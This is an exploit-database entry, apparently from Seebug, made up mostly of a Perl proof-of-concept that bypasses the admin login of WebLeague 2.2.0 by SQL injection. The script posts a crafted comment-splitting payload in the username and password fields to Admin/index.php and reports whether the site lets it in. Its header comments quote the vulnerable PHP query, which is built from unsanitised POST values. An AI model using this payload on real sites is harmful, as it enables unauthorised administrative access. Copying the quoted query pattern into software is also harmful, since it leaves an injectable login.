webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit

2009-07-16T00:00:00
ID SSV:14822
Type seebug
Reporter Root
Modified 2009-07-16T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/perl -W
#
# WebLeague 2.2.0 Remote Admin Bypass p0c
# written by ka0x <ka0x01[at]gmail.com>
#
# need magic_quotes_gpc = Off
#
# Vuln code (Admin/index.php) :
#
# 10:	$sql="SELECT * FROM $admintable WHERE name = '$_POST[username]' AND password = '$_POST[password]'"; // ---> NOT CLEAN $_POST VARS
# 11:	$result=mysql_query($sql,$db);
# 12:	$number = mysql_num_rows($result);
# 13:	if ($number == "1") {
#

use LWP::UserAgent ;

my $timeout = 10 ;

die "* USAGE: \tperl $0 <host>\n" unless $ARGV[0] ;

my $host = $ARGV[0] ;

$host = 'http://'.$host if( $host !~ /^http:/ ) ;
$host = $host.'/' unless( substr( $host, -1 ) eq '/' ) ;

my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout( $timeout ) ;

my $req = HTTP::Request->new( POST => $host.'Admin/index.php' );
$req->content_type( 'application/x-www-form-urlencoded' ) ;
$req->content( 'username=\'/*&password=*/ or \'\'=\'' ) ; 	# content $_POST vars: 
								# username=  '/*
								# password=   */ or ''='
my $res = $ua->request( $req ) ;

if( $res->content =~ /You are logged in as/i ){
	print "[+] The website is vulnerable." ;
} 
else {
	print "[-] The website isn't vulnerable." ;
}


__END__

# sebug.net